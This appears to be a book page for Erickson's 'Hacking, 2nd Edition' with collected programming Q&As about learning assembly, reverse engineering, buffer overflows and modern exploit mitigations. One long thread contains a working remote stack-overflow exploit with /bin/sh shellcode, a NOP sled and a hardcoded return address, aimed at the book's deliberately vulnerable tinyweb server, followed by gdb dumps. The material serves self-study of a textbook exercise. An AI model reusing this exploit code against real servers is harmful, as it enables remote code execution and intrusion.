Hacking, 2nd Edition

Jon Erickson

Mentioned 16

An introduction to hacking describes the techniques of computer hacking, covering such topics as stack-based overflows, format string exploits, network security, cryptographic attacks, and shellcode.

More on Amazon.com

Mentioned in questions and answers.

I decided to learn Assembly language. The main reason to do so is being able to understand disassembled code and maybe being able to write more efficient parts of code (for example, through c++), doing somethings like code caves, etc. I saw there are a zillion different flavors of assembly, so, for the purposes I mention, how should I start? What kind of assembly should I learn? I want to learn by first doing some easy programs (i.e. a calculator), but the goal itself will be to get accostumed with it so I can understand the code shown, for example, by IDA Pro.

I'm using windows (if that makes any difference).

edit: So, seems everyone is pointing towards MASM. Although I get the point that it has high level capabilities, all good for the assembly code programmer, that's not what I'm looking for. It seems to have if, invoke, etc instructions not shown in popular deassemblers (like IDA). So what I'd like to hear if possible, is the opinion of anyone that uses ASM for the purposes I am asking (reading deassembled exe's code in IDA), not just "general" assembly programmers.

edit: OK. I am already learning assembly. I am learning MASM, not using the high level stuff that doesn't matter to me. What I'm doing right now is trying out my code on __asm directives in c++, so I can try out things way faster than if I had to do everything from scratch with MASM.

Are you doing other dev work on windows? On which IDE? If it's VS, then there's no need for an additional IDE just to read disassembled code: debug your app (or attach to an external app), then open the disassembly window (in the default settings, that's Alt+8). Step and watch memory/registers as you would through normal code. You might also want to keep a registers window open (Alt+5 by default).

Intel gives free manuals, that give both a survey of basic architecture (registers, processor units etc.) and a full instruction reference. As the architecture matures and is getting more complex, the 'basic architecture' manuals grow less and less readable. If you can get your hands on an older version, you'd probably have a better place to start (even P3 manuals - they explain better the same basic execution environment).

If you care to invest in a book, here is a nice introductory text. Search amazon for 'x86' and you'd get many others. You can get several other directions from another question here.

Finally, you can benefit quite a bit from reading some low-level blogs. These byte-size info bits work best for me, personally.

To do what you're wanting to do, I just took the Intel Instruction Set Reference (might not be the exact one I used, but it looks sufficient) and some simple programs I wrote in Visual Studio and started throwing them into IDAPro/Windbg. When I out-grew my own programs, the software at crackmes was helpful.

I'm assuming that you have some basic understanding of how programs execute on Windows. But really, for reading assembly, there's only a few instructions to learn and a few flavors of those instructions (e.g., there's a jump instruction, jump has a few flavors like jump-if-equal, jump-if-ecx-is-zero, etc). Once you learn the basic instructions it's pretty simple to get the gist of the program execution. IDA's graph view helps, and if you're tracing the program with Windbg, it's pretty simple to figure out what the instructions are doing if you're not sure.

After a bit of playing like that, I bought Hacker Disassembly Uncovered. Generally, I stay away from books with the word "Hacker" in the title, but I really liked how this one went really in-depth about how compiled code looked disassembled. He also goes into compiler optimizations and some efficiency stuff that was interesting.

It all really depends on how deeply you want to be able to understand the program, too. If you're reverse engineering a target looking for vulnerabilities, if you're writing exploit code, or analyzing packed malware for capabilities, you'll need more of a ramp-up time to really get things going (especially for the more advanced malware). On the other hand, if you just want to be able to change your character's level on your favorite video game, you should be doing fine in a relatively short amount of time.

I found Hacking: The Art of Exploitation to be an interesting and useful way into this topic... can't say that I have ever used the knowledge directly, but that's really not why I read it. It gives you a much richer appreciation of the instructions that your code compiles to, which has occasionally been useful in understanding subtler bugs.

Don't be put off by the title. Most of the first part of the book is "Hacking" in the Eric Raymond sense of the word: creative, surprising, almost sneaky ways to solve tough problems. I (and maybe you) was a lot less interested in the security aspects.

(I don't know about you but I was excited with assembly)

A simple tool for experimenting with assembly is already installed in your pc.

Go to Start menu->Run, and type debug

debug (command)

debug is a command in DOS, MS-DOS, OS/2 and Microsoft Windows (only x86 versions, not x64) which runs the program debug.exe (or DEBUG.COM in older versions of DOS). Debug can act as an assembler, disassembler, or hex dump program allowing users to interactively examine memory contents (in assembly language, hexadecimal or ASCII), make changes, and selectively execute COM, EXE and other file types. It also has several subcommands which are used to access specific disk sectors, I/O ports and memory addresses. MS-DOS Debug runs at a 16-bit process level and therefore it is limited to 16-bit computer programs. FreeDOS Debug has a "DEBUGX" version supporting 32-bit DPMI programs as well.

Tutorials:


If you want to understand the code you see in IDA Pro (or OllyDbg), you'll need to learn how compiled code is structured. I recommend the book Reversing: Secrets of Reverse Engineering

I experimented a couple of weeks with debug when I started learning assembly (15 years ago).
Note that debug works at the base machine level, there are no high level assembly commands.

And now a simple example:

Give a to start writing assembly code - type the below program - and finally give g to run it.

alt text


(INT 21 display on screen the ASCII char stored in the DL register if the AH register is set to 2 -- INT 20 terminates the program)

There's always skepticism from non-programmers when honest developers learn the techniques of black hat hackers. Obviously though, we need to learn many of their tricks so we can keep our own security up to par.

To what extent do you think an honest programmer needs to know the methods of malicious programmers?

Definitely learn the dark side. Even if you don't learn the actual techniques, at least make the effort to learn what's possible.

alt textalt text

Good resources to learn the tricks of the trade are Reversing: Secrets of Reverse Engineering and Hacking: The Art of Exploitation. They're written for both sides - these could be used to LEARN how to hack, but they also give ways to prevent these kinds of attacks.

I have heard about a buffer overflow and I would like to know how to cause one.

Can someone show me a small buffer overflow example? New(And what they are used for?)

The "classic" buffer overflow example is:

int main(int argc, char *argv[])
{
    char buffer[10];
    strcpy(buffer, argv[1]);
}

That lets you play with the buffer overflow parameters and tweak them to your hearts content. The book "Hacking - The Art of Exploitation" (Link goes to Amazon) goes into great detail about how to play around with buffer overflows (purely as an intellectual exercise obviously).

I've read and finished both Reversing: Secrets of Reverse Engineering and Hacking: The Art of Exploitation. They both were illuminating in their own way but I still feel like a lot of the techniques and information presented within them is outdated to some degree.

When the infamous Phrack Article, Smashing the Stack for Fun and Profit, was written 1996 it was just before what I sort of consider the Computer Security "golden age".

Writing exploits in the years that followed was relatively easy. Some basic knowledge in C and Assembly was all that was required to perform buffer overflows and execute some arbitrary shell code on a victims machine.

To put it lightly, things have gotten a lot more complicated. Now security engineers have to contend with things like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Stack Cookies, Heap Cookies, and much more. The complexity of writing exploits went up at least an order of magnitude.

You can't event run most of the buffer overrun exploits in the tutorials you'll find today without compiling with a bunch of flags to turn off modern protections.

Now if you want to write an exploit you have to devise ways to turn off DEP, spray the heap with your shell-code hundreds of times and attempt to guess a random memory location near your shellcode. Not to mention the pervasiveness of managed languages in use today that are much more secure when it comes to these vulnerabilities.

I'm looking to extend my security knowledge beyond writing toy-exploits for a decade old system. I'm having trouble locating resources that help address the issues of writing exploits in the face of all the protections I outlined above.

What are the more advanced and prevalent papers, books or other resources devoted to contending with the challenges of writing exploits for modern systems?

I'm currently a freshman in college, majoring in CS. I'm just about done with my "Intro to Computer Programming" class. I like it and feel like I'm learning a good bit.

A couple days ago, I read Joel's The Peril Of Java Schools. "A Linked List?" I thought, "those aren't even hard. We've done a bunch of those already in the class I'm in right now." Which is correct, because in Java, they're not that hard. But anyways, I tried to give writing one in C a try.

And it is SO HARD!

Joel was right, I think ... Java deals with so many little itsy-bitsy things for you that it's really not that hard. But I'm determined to overcome my school's Java-tude and learn how to write this dang linked list in C.

So I guess, instead of trying to ask lots and lots of little tiny questions, I am asking, does anyone know of a good (& free) online tutorial for learning C? Specifically, learning how to deal with pointers, and all those symbols (&, *, **, [] and how they work together) I'd like to think I'm already pretty proficient in Java, so I don't need the tutorials on how to write a "Hello, World!" program. But then I'm definitely not ready to get into any super-advanced C or C++ anything, because all I know is Java.

Any help appreciated!

There are numerous guides across the internet for learning pointers. Here's one: http://pweb.netcom.com/~tjensen/ptr/pointers.htm which I've used.

I'm also going to suggest this book to you: Hacking, the Art of Exploitation 2nd Ed.

This book will not make you a "hacker". Nothing but lots of reverse engineering / studying binary code, trial and error etc is going to do that. It does, however, introduce to you how you start doing these things and that comes down to a fundamental understanding of how C works, including pointers. Its introduction to assembly/C is one of the best I've seen because it runs you through several C examples and how you investigate what's going on with gdb, a command line debugging tool. That way you can see the C and see the assembly. This includes a fundamental understanding of what pointers are.

This book will as a side-effect give you an introduction to the stack and the heap, data structures etc. In short, reading the intro sections will give you a lot of benefit for the rest of your course.

I am reading a book about hacking and it has a chapter about assembly.

Following is my tiny program written in C.

#include <stdio.h>

int main(int argc, char const *argv[])
{
    int i;

    for (i = 0; i < 10; i++) {
        puts("Hello World!");
    }

    return 0;
}

And the following is gdb test:

(gdb) break main
Breakpoint 1 at 0x40050f: file main.c, line 7.
(gdb) run
Breakpoint 1, main (argc=1, argv=0x7fffffffe708) at main.c:7
7       for (i = 0; i < 10; i++) {
(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000400500 <+0>: push   rbp
   0x0000000000400501 <+1>: mov    rbp,rsp
   0x0000000000400504 <+4>: sub    rsp,0x20
   0x0000000000400508 <+8>: mov    DWORD PTR [rbp-0x14],edi
   0x000000000040050b <+11>:    mov    QWORD PTR [rbp-0x20],rsi
=> 0x000000000040050f <+15>:    mov    DWORD PTR [rbp-0x4],0x0
   0x0000000000400516 <+22>:    jmp    0x400526 <main+38>
   0x0000000000400518 <+24>:    mov    edi,0x4005c4
   0x000000000040051d <+29>:    call   0x4003e0 <puts@plt>
   0x0000000000400522 <+34>:    add    DWORD PTR [rbp-0x4],0x1
   0x0000000000400526 <+38>:    cmp    DWORD PTR [rbp-0x4],0x9
   0x000000000040052a <+42>:    jle    0x400518 <main+24>
   0x000000000040052c <+44>:    mov    eax,0x0
---Type <return> to continue, or q <return> to quit---
   0x0000000000400531 <+49>:    leave  
   0x0000000000400532 <+50>:    ret    
End of assembler dump.

The following part is the things that I don't understand. Please note that $rip is the "instruction pointer" and points to 0x000000000040050f <+15>

(gdb) x/x $rip
0x40050f <main+15>: 0x00fc45c7
(gdb) x/12x $rip
0x40050f <main+15>: 0x00fc45c7  0xeb000000  0x05c4bf0e  0xbee80040
0x40051f <main+31>: 0x83fffffe  0x8301fc45  0x7e09fc7d  0x0000b8ec
0x40052f <main+47>: 0xc3c90000  0x1f0f2e66  0x00000084  0x1f0f0000
(gdb) x/8xb $rip
0x40050f <main+15>: 0xc7    0x45    0xfc    0x00    0x00    0x00    0x00    0xeb
(gdb) x/8xh $rip
0x40050f <main+15>: 0x45c7  0x00fc  0x0000  0xeb00  0xbf0e  0x05c4  0x0040  0xbee8
(gdb) x/8xw $rip
0x40050f <main+15>: 0x00fc45c7  0xeb000000  0x05c4bf0e  0xbee80040
0x40051f <main+31>: 0x83fffffe  0x8301fc45  0x7e09fc7d  0x0000b8ec

First command x/x $rip outputs 0x40050f <main+15>: 0x00fc45c7.

Is it the instruction at 0x40050f? Is 0x00fc45c7 same as mov DWORD PTR [rbp-0x4],0x0 (assembled instruction at 0x40050f)?

Secondly, if it is the instruction, what are those hex numbers from the output of commands x/12x $rip, x/8xw $rip, x/8xh $rip?

As to (1), you got that correct.

As to (2), the x command has up to 3 specifiers: how many objects to print; in which format; and what object size. In all your examples you choose to print as hex (x). As to the first specifier, you ask to print 12, 8, 8 objects.

As to the last specifier in your cases:
x/12x has none, so gdb defaults to assuming you want double words, aka, in 4 byte chunks. Note that you find double word sometimes defined differently, but in intel x86 assembly/gdb, it's 4 bytes. Generally, I'd always specify what exactly you want as opposed to falling back on default settings.

x/8xw does the same, for 8 objects, as you explicitly requested dwords now.

x/8xh requests half-word sized chunks of bytes, so objects printed in 2 byte chunks. In case you wonder why the concatenation of two neighboring values does not equal what was reported when you printed in dwords, this is because the x86 is a little-endian architecture. What that means is detailed quite well in erickson's book again - if you look a few pages ahead, he does some calculations you might find helpful. In a nutshell, if you recombine them (2,1) (4,3), ..., you'll see they match.

I've been working on a buffer overflow from Jon Erickson's Art of Exploitation for a few days now, and I don't understand why I'm getting a segmentation fault. As far as I can tell, the return address is being overwritten properly with an address in the NOP sled, but the program throws a segmentation fault every time it reaches the return instruction at the end of the stack frame.

The vulnerable section of the code is the length = recv_line(sockfd, request); as the buffer size is never checked. The entire function taken from the tinyweb program follows-

void (handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr)){
unsigned char *ptr, request[500], resource[500];
int fd, length;

printf("[DEBUG] hc:1 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);
length = recv_line(sockfd, request);
printf("[DEBUG] hc:2 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);

printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
printf("[DEBUG] hc:3 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);

ptr = strstr(request, " HTTP/");
if(ptr == NULL){
    printf(" NOT HTTP!\n");
} else {
    *ptr = 0;
    ptr = NULL;
    if(strncmp(request, "GET ", 4) == 0)
        ptr = request + 4;
    if(strncmp(request, "HEAD ", 5) ==0)
        ptr = request + 5;

    if(ptr == NULL){
        printf("\tUNKNOWN REQUEST!");
    } 
    else {
        if(ptr[strlen(ptr) -1] == '/')
            strcat(ptr, "index.html");
        strcpy(resource, WEBROOT);
        strcat(resource, ptr);
        fd = open(resource, O_RDONLY, 0);
        printf("\tOpening \'%s\'\t", resource);
        if(fd == -1){
            printf(" 404 Not Found\n");
            send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
            send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
        } 
        else{
            printf(" 200 OK\n");
            send_string(sockfd, "HTTP/1.0 200 OK\r\n");
            send_string(sockfd, "Server Tiny webserver\r\n\r\n");
            if(ptr == request + 4){
                if( (length = get_file_size(fd)) == -1)
                    fatal("getting resource file size");
                if( (ptr = (unsigned char *) malloc(length)) == NULL)
                    fatal("allocating memory for reading resource");
                read(fd, ptr, length);
                send(sockfd, ptr, length, 0);
                free(ptr);
            }
            close(fd);
        }
    }
}
printf("Shutting down socket.\n");
shutdown(sockfd, SHUT_RDWR);
printf("[DEBUG] hc:4 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);
}

The exploit code follows below-

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "hacking.h"
#include "hacking-network.h"

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

#define OFFSET 524
#define RETADDR 0xbfdaf708

int main(int argc, char *argv[]){
int i, sockfd, buflen; //, count;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[600];

if(argc < 1){
    printf("Usage: %s <hostname> <# of A's to insert>\n", argv[0]);
    exit(1);
}

if((host_info = gethostbyname(argv[1])) == NULL)
    fatal("looking up hostname");

if((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
    fatal("in socket");

//count = atoi(argv[2]);
    //printf("Count: %d\n", count);
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(81);
target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
memset(&(target_addr.sin_zero), '\0', 8);

if(connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
    fatal("connecting to target server");

bzero(buffer, 600); 
memset(buffer, '\x90', OFFSET);
*((u_int *)(buffer + OFFSET)) = RETADDR;
memcpy(buffer+300, shellcode, strlen(shellcode));
strcat(buffer, "\r\n"); 
printf("Exploit  buffer:\n");
dump(buffer, strlen(buffer));
send_string(sockfd, buffer);

exit(0);
}

Here is the information from GDB

:~/programs/c/exec$ ps aux | grep tinyweb
         2747  0.1  2.3  97432 48012 pts/1    Sl   Dec15   2:37 gedit tinyweb_exploit.c
root     12444  0.0  0.0   1688   248 pts/2    S+   18:32   0:00 ./tinyweb
         12456  0.0  0.0   4012   768 pts/0    S+   18:33   0:00 grep --color=auto tinyweb
:~/programs/c/exec$ sudo gdb -q --pid=12444 --symbols=./tinyweb

warning: not using untrusted file "/home/sam/.gdbinit"
Reading symbols from /home/sam/programs/c/exec/tinyweb...done.
Attaching to process 12444
Load new symbol table from "/home/sam/programs/c/exec/tinyweb"? (y or n) y
Reading symbols from /home/sam/programs/c/exec/tinyweb...done.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0x001c3416 in __kernel_vsyscall ()
(gdb) break 74
Breakpoint 1 at 0x8048e8c: file ../code/tinyweb.c, line 74.
(gdb) c
Continuing.

Breakpoint 1, handle_connection (sockfd=4, client_addr_ptr=0xbfcee1e4) at ../code/tinyweb.c:74
74      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), 
    ntohs(client_addr_ptr->sin_port), request);
(gdb) x/16xw request + 500
0xbfcee1a4: 0x0099bad0  0x00aad4e0  0x0000000f  0xbfcee1c4
0xbfcee1b4: 0x00aacff4  0xbfcee218  0x08048e2f  0x00000004
0xbfcee1c4: 0xbfcee1e4  0x00000004  0xbfcee204  0x00000004
0xbfcee1d4: 0x0804aff4  0xbfcee1e8  0x08048658  0x00000010
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbfcee1e4) at ../code/tinyweb.c:74
#1  0x08048e2f in main () at ../code/tinyweb.c:60
(gdb) x/x request
0xbfcedfb0: 0x20544547
(gdb) p /x 0xbfcee1b4 + 8
$5 = 0xbfcee1bc
(gdb) p $5 - 0xbfcedfb0
$6 = 524
(gdb) p /x 0xbfcedfb0 + 200
$7 = 0xbfcee078
(gdb) c
Continuing.

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbfcee1e4) at ../code/tinyweb.c:74
74      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), 
ntohs(client_addr_ptr->sin_port), request);
(gdb) x/150xw request
0xbfcedfb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedfc0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedfd0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedfe0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedff0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee000: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee010: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee020: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee030: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee040: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee050: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee060: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee070: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee080: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee090: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0a0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0b0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0c0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0d0: 0x90909090  0x90909090  0x90909090  0xdb31c031
0xbfcee0e0: 0xb099c931  0x6a80cda4  0x6851580b  0x68732f2f
0xbfcee0f0: 0x69622f68  0x51e3896e  0x8953e289  0x9080cde1
0xbfcee100: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee110: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee120: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee130: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee140: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee150: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee160: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee170: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee180: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee190: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee1a0: 0x90909090  0x90909090  0x90909090  0x00000211
0xbfcee1b0: 0x90909090  0x90909090  0x90909090  0xbfcee078
0xbfcee1c0: 0x0000000d  0xbfcee1e4  0x00000005  0xbfcee204
0xbfcee1d0: 0x00000004  0x0804aff4  0xbfcee1e8  0x08048658
0xbfcee1e0: 0x00000010  0xd4920002  0x0100007f  0x00000000
0xbfcee1f0: 0x00000000  0x51000002  0x00000000  0x00000000
0xbfcee200: 0x00000000  0x00000001
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x080491b1 in handle_connection (sockfd=Cannot access memory at address 0x90909098
) at ../code/tinyweb.c:125
125 }
(gdb) i r eip
eip            0x80491b1    0x80491b1 <handle_connection+893>
    (gdb) x/i 0x080491b1
=> 0x80491b1 <handle_connection+893>:   ret    

The tinyweb program is started, and then GDB is attached to the program. A breakpoint is set to determine where the buffer is located in memory (request @ 0xbfcedfb0). bt is used to determine what the current return address is and its location (ret address 0x08048e2f located at 0xbfcee1bc) The return address is determined to be 524 bytes from the buffer. The exploit uses a return address 200 bytes into the buffer, and puts the shellcode 300 bytes in. After the exploit is run, the buffer is examined, containing the NOP sled, the shellcode, and clearly showing the original return address at 0xbfcee1bc which had 0x08048e2f now containing the address 0xbfcee078, which is clearly an address in the buffer pointing to a NOP. However, when the program is continued, it throws a segmentation fault. After the segmentation fault the instruction pointer is examined, pointing to a line in the handle connection stack frame. When examined, this shows the return instruction.

Why is it throwing a segmentation fault at the return instruction when there is a valid memory address placed there for it to return to??

Edit 1

Im embarrassed I didn't notice that shellcode bit earlier. Then again, I haven't gotten the earlier exploits to work either yet courtesy of ASLR, so I never looked that closely at the shellcode. Anyways here is what I changed it to-

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x89\xe3\x51\x89\xe2\x53\x89\xe1"
"\xcd\x80";

............1.1.1......j.XQh//bin/sh..Q..S.....

Unfortunately, Im looking at the same issue. Ive got some more GDB shown below. As best I can tell, when the RET is called, somehow the sockfd variable is gets screwed up, but as the DEBUG prints show, the sockfd doesnt get changed. Ive tried stepping through the instructions at the end to see whats going on, but that hasnt revealed much...

[DEBUG] hc:3 sockfd is at bfefcae0 and contains 0x0000000d
 NOT HTTP!
 Shutting down socket.
[DEBUG] hc:4 sockfd is at bfefcae0 and contains 0x0000000d
Segmentation fault (core dumped)



(gdb) list 120
115                     send(sockfd, ptr, length, 0);
116                     free(ptr);
117                 }
118                 close(fd);
119             }
120         }
121     }
122     printf("Shutting down socket.\n");
123     shutdown(sockfd, SHUT_RDWR);
124     printf("[DEBUG] hc:4 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd); 
125 }
126 
127 int get_file_size(int fd){
128     struct stat stat_struct;
129     
130     if(fstat(fd, &stat_struct) == -1)
131         return -1;
132     return (int) stat_struct.st_size;
133 }
134     
(gdb) break 74
Breakpoint 1 at 0x8048e8c: file ../code/tinyweb.c, line 74.
(gdb) break 120
Breakpoint 2 at 0x804916f: file ../code/tinyweb.c, line 120.

Breakpoint 2, handle_connection (sockfd=13, client_addr_ptr=0xbfefcb04) at ../code/tinyweb.c:122
122     printf("Shutting down socket.\n");
(gdb) x/170xw request
0xbfefc8d0: 0x90909090  0x90909090  0x90909090  0x90909090
....Output Trimmed....
0xbfefc990: 0x90909090  0x90909090  0x90909090  0x90909090
                                    ^  
...Output Trimmed....               |________________________RET address location in NOP sled

0xbfefc9f0: 0x90909090  0x90909090  0x90909090  0xdb31c031
0xbfefca00: 0xb099c931  0x6a80cda4  0x6851580b  0x69622f2f
0xbfefca10: 0x68732f6e  0x8951e389  0xe18953e2  0x909080cd
0xbfefca20: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca30: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca40: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca50: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca60: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca70: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca80: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca90: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefcaa0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefcab0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefcac0: 0x90909090  0x00000000  0x90909090  0x00000211

0xbfefcad0: 0x90909090  0x90909090  0x90909090  0xbfefc998<= RET address

0xbfefcae0: 0x0000000d  0xbfefcb04  0x00000006  0xbfefcb24
0xbfefcaf0: 0x00000004  0x0804aff4  0xbfefcb08  0x08048658
0xbfefcb00: 0x00000010  0xd9a40002  0x0100007f  0x00000000
0xbfefcb10: 0x00000000  0x51000002  0x00000000  0x00000000
0xbfefcb20: 0x00000000  0x00000001  0x00000006  0x00000003
0xbfefcb30: 0x080491f0  0x00000000  0xbfefcbb8  0x00126ce7
0xbfefcb40: 0x00000001  0xbfefcbe4  0xbfefcbec  0xb7810848
0xbfefcb50: 0xbfefcc4c  0xffffffff  0x00b0dff4  0x08048497
0xbfefcb60: 0x00000001  0xbfefcba0  0x00aff136  0x00b0ead0
0xbfefcb70: 0xb7810b28  0x00268ff4

(gdb) bt
#0  handle_connection (sockfd=13, client_addr_ptr=0xbfefcb04) at ../code/tinyweb.c:122
#1  0xbfefc998 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

(gdb) x/20i $eip
=> 0x804916f <handle_connection+827>:   movl   $0x804985b,(%esp)
   0x8049176 <handle_connection+834>:   call   0x804880c <puts@plt>
   0x804917b <handle_connection+839>:   mov    0x8(%ebp),%eax
   0x804917e <handle_connection+842>:   movl   $0x2,0x4(%esp)
   0x8049186 <handle_connection+850>:   mov    %eax,(%esp)
   0x8049189 <handle_connection+853>:   call   0x804868c <shutdown@plt>
   0x804918e <handle_connection+858>:   mov    0x8(%ebp),%edx
   0x8049191 <handle_connection+861>:   mov    $0x8049874,%eax
   0x8049196 <handle_connection+866>:   mov    %edx,0x8(%esp)
   0x804919a <handle_connection+870>:   lea    0x8(%ebp),%edx
   0x804919d <handle_connection+873>:   mov    %edx,0x4(%esp)
   0x80491a1 <handle_connection+877>:   mov    %eax,(%esp)
   0x80491a4 <handle_connection+880>:   call   0x804878c <printf@plt>
   0x80491a9 <handle_connection+885>:   add    $0x414,%esp
   0x80491af <handle_connection+891>:   pop    %ebx
   0x80491b0 <handle_connection+892>:   pop    %ebp
   0x80491b1 <handle_connection+893>:   ret    
   0x80491b2 <get_file_size>:   push   %ebp
   0x80491b3 <get_file_size+1>: mov    %esp,%ebp
   0x80491b5 <get_file_size+3>: sub    $0x78,%esp
(gdb) s
123     shutdown(sockfd, SHUT_RDWR);
(gdb) x/x &sockfd
0xbfefcae0: 0x0000000d
(gdb) s
124     printf("[DEBUG] hc:4 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);
(gdb) i r eip
eip            0x804918e    0x804918e <handle_connection+858>
(gdb) s
125 }
(gdb) x/10i $eip
=> 0x80491a9 <handle_connection+885>:   add    $0x414,%esp
   0x80491af <handle_connection+891>:   pop    %ebx
   0x80491b0 <handle_connection+892>:   pop    %ebp
   0x80491b1 <handle_connection+893>:   ret    
   0x80491b2 <get_file_size>:   push   %ebp
   0x80491b3 <get_file_size+1>: mov    %esp,%ebp
   0x80491b5 <get_file_size+3>: sub    $0x78,%esp
   0x80491b8 <get_file_size+6>: lea    -0x60(%ebp),%eax
   0x80491bb <get_file_size+9>: mov    %eax,0x4(%esp)
   0x80491bf <get_file_size+13>:    mov    0x8(%ebp),%eax
(gdb) si
0x080491af  125 }
(gdb) i r eip
eip            0x80491af    0x80491af <handle_connection+891>
(gdb) si
0x080491b0  125 }
(gdb) i r eip
eip            0x80491b0    0x80491b0 <handle_connection+892>
(gdb) info registers
eax            0x3b 59
ecx            0xbfefc6a8   -1074805080
edx            0x26a360 2532192
ebx            0x90909090   -1869574000
esp            0xbfefcad8   0xbfefcad8
ebp            0xbfefcad8   0xbfefcad8
esi            0x0  0
edi            0x0  0
eip            0x80491b0    0x80491b0 <handle_connection+892>
eflags         0x200286 [ PF SF IF ID ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb) si
0x080491b1 in handle_connection (sockfd=Cannot access memory at address 0x90909098
) at ../code/tinyweb.c:125
125 }
    (gdb) x/x sockfd
    Cannot access memory at address 0x90909098
    (gdb) x/x &sockfd
    0x90909098: Cannot access memory at address 0x90909098

Any thoughts as to whats going on?

As promised earlier...here is the explanation along with the fix.

The reason the exploit failed on my system (Ubuntu 10.10) was the result of the implementation of the non executable stack (note the RW ending)

$ gcc -fno-stack-protector -g -z noexecstack -o tinyweb ../code/tinyweb.c && readelf -l   
tinyweb_exploit | grep -i stack

GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

This resulted in the following GDB output.

    Breakpoint 1, handle_connection (sockfd=4, client_addr_ptr=0xbfff1c94) at ../code/tinyweb.c:61
61      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),            
ntohs     (client_addr_ptr->sin_port), request);
(gdb) x/16xw request + 500
0xbfff1c54: 0x00d09d90  0xbfff1c90  0x0000000f  0x00000003
0xbfff1c64: 0x00268ff4  0xbfff1cc8  0x08048cec  0x00000004 
          Programs return address at 0xbfff1c6c---^
0xbfff1c74: 0xbfff1c94  0xbfff1c90  0xbfff1cb4  0x00000004
0xbfff1c84: 0x0804aff4  0xbfff1c98  0x08048658  0x00000010
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbfff1c94) at ../code/tinyweb.c:61
#1  0x08048cec in main () at ../code/tinyweb.c:49

(gdb) x/150x request
----Output Trimmed----
